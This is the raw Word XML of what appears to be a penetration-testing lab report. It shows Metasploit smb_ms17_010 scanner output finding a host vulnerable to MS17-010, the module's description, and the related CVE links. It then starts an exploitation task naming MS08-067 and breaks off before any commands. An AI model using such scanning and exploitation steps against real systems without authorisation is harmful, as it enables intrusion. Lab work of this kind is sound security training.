    <w:p w14:paraId="1696E9B5" w14:textId="7C7E9FD9" w:rsidR="00A511F7" w:rsidRDefault="00A511F7" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F77A579"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msf5 auxiliary</w:t>
      </w:r>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smb_ms17_010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0C13EB00"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732B22E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Host</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likely VULNERABLE to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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> x86 </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r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E627AB"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Scanned</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hosts</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complete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108CB6CC"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Auxiliary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> execution completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666AD373" w14:textId="77777777" w:rsidR="00D23AAD" w:rsidRDefault="00D23AAD" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2066B0F4" w14:textId="789D2BCC" w:rsidR="00A511F7" w:rsidRPr="00665469" w:rsidRDefault="00D23AAD" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The result of the </w:t>
      </w:r>
      <w:r w:rsidR="00834D24">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>auxiliary attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells the penetration tester that the target system is vulnerable to MS17-010</w:t>
      </w:r>
      <w:r w:rsidR="00665469">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00665469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A511F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>This is what the smb_ms17_010 attack does to the target system</w:t>
      </w:r>
      <w:r w:rsidR="00834D24">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (taken from show info command)</w:t>
      </w:r>
      <w:r w:rsidR="00A511F7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4617DD" w14:textId="7907DF40" w:rsidR="00A511F7" w:rsidRDefault="00A511F7" w:rsidP="00A511F7">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476D3B47"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4487F46D"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Uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> information disclosure to determine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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has been</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB8C713"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patched </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>not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Specifically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> it connects to the IPC$ tree </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B9F6B4"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attempts a transaction on FID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the status returned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5639FFDA"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8800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"STATUS_INSUFF_SERVER_RESOURCES"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the machine does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> have the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A192B56"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patch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the machine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> missing the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patch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A0444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module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> will check </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an existing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DoublePulsar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ring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59674C6D"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shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>malware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> infection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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> valid SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEBD12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credentials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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> server configurations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It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> can log on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C2E688"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user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"\" and connect to IPC$.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4323375C" w14:textId="77777777" w:rsidR="00665469" w:rsidRDefault="00A511F7" w:rsidP="00BE149A">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD7B6E1" w14:textId="40A633EF" w:rsidR="00BE149A" w:rsidRDefault="00BE149A" w:rsidP="00BE149A">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Here are the CVEs related with smb_ms17_010:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C69730" w14:textId="77777777" w:rsidR="00834D24" w:rsidRDefault="00834D24" w:rsidP="00BE149A">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7070059B" w14:textId="349359C3"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CVE-2017-0143:</w:t>
      </w:r>
      <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://cvedetails.com/cve/CVE-2017-0143/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1493F45C" w14:textId="1BBEE133"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CVE-2017-0144:</w:t>
      </w:r>
      <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://cvedetails.com/cve/CVE-2017-0144/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B123A60" w14:textId="4C092A39"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 xml:space="preserve">CVE-2017-0145: </w:t>
      </w:r>
      <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://cvedetails.com/cve/CVE-2017-0145/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55563D41" w14:textId="6D464B45"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CVE-2017-0146:</w:t>
      </w:r>
      <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://cvedetails.com/cve/CVE-2017-0146/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6878D248" w14:textId="0C17D457"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CVE-2017-0147:</w:t>
      </w:r>
      <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://cvedetails.com/cve/CVE-2017-0147/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48AB0027" w14:textId="4AEC0A0E" w:rsidR="00BE149A" w:rsidRDefault="00834D24" w:rsidP="00665469">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>CVE-2017-0148:</w:t>
      </w:r>
      <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00BE149A" w:rsidRPr="00BE149A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://cvedetails.com/cve/CVE-2017-0148/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03C35132" w14:textId="646DDBB3" w:rsidR="00BE149A" w:rsidRDefault="00BE149A" w:rsidP="00BE149A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc20508499"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part 2: Exploits</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="65925484" w14:textId="39C13AC6" w:rsidR="00BE149A" w:rsidRDefault="00BE149A" w:rsidP="00BE149A"/>
    <w:p w14:paraId="44F88A35" w14:textId="3C9A1187" w:rsidR="00BE149A" w:rsidRDefault="00BE149A" w:rsidP="00BE149A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc20508500"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task 2:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7D9F2E19" w14:textId="665FDF51" w:rsidR="00BE149A" w:rsidRPr="00BE149A" w:rsidRDefault="00BE149A" w:rsidP="00BE149A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE149A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>After setting all options perform the exploit. Report the steps &amp; commands you used in order to gain remote access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF38F3" w14:textId="77777777" w:rsidR="00BE149A" w:rsidRPr="00BE149A" w:rsidRDefault="00BE149A" w:rsidP="00BE149A">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="617EC428" w14:textId="414DABA0" w:rsidR="00BE149A" w:rsidRDefault="00830C65" w:rsidP="00BE149A">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit I chose takes advantage of the MS08-067 vulnerability. </w:t>
      </w:r>
      <w:r w:rsidR="001256FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
